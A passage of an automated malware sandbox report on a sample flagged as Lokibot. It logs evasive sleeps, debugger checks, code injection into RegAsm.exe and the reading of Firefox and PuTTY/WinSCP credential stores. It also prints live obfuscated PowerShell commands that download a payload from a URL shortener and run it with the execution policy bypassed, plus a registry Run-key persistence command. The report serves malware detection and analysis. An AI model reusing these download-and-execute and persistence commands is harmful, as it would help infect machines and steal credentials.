Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\ntrwe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\ntrwe.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\ntrwe.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\ntrwe.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\ntrwe.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2708 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1484 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1840 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1840 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 1836 Thread sleep count: 187 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe TID: 2964 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\ntrwe.exe TID: 1476 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Users\user\ntrwe.exe TID: 1476 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\ntrwe.exe TID: 1900 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\ntrwe.exe TID: 1544 Thread sleep count: 156 > 30 Jump to behavior
Source: C:\Users\user\ntrwe.exe TID: 1192 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 2076 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 2076 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\ntrwe.exe TID: 2492 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\ntrwe.exe TID: 2492 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\ntrwe.exe TID: 2500 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\ntrwe.exe TID: 1776 Thread sleep count: 185 > 30
Source: C:\Users\user\ntrwe.exe TID: 2784 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 17_2_00403D74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: 12.exe, 0000000B.00000003.2176518302.00000000082B9000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_0040317B mov eax, dword ptr fs:[00000030h] 17_2_0040317B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00402B7C GetProcessHeap,RtlAllocateHeap, 17_2_00402B7C
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\ntrwe.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\ntrwe.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\ntrwe.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\12.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Users\user\ntrwe.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and write
Bypasses PowerShell execution policy
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Injects a PE file into a foreign processes
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 415000 Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 41A000 Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 4A0000 Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008 Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 401000
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 415000
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 41A000
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 4A0000
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe' Jump to behavior
Source: C:\Users\user\ntrwe.exe Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe Jump to behavior
Source: C:\Users\user\ntrwe.exe Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe Queries volume information: C:\Users\user\AppData\Local\Temp\12.exe VolumeInformation Jump to behavior
Source: C:\Users\user\ntrwe.exe Queries volume information: C:\Users\user\ntrwe.exe VolumeInformation Jump to behavior
Source: C:\Users\user\ntrwe.exe Queries volume information: C:\Users\user\ntrwe.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation Jump to behavior
Source: C:\Users\user\ntrwe.exe Queries volume information: C:\Users\user\ntrwe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00406069 GetUserNameW, 17_2_00406069
Source: C:\Users\user\AppData\Local\Temp\12.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Lokibot
Source: Yara match File source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 12.exe PID: 2800, type: MEMORY
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
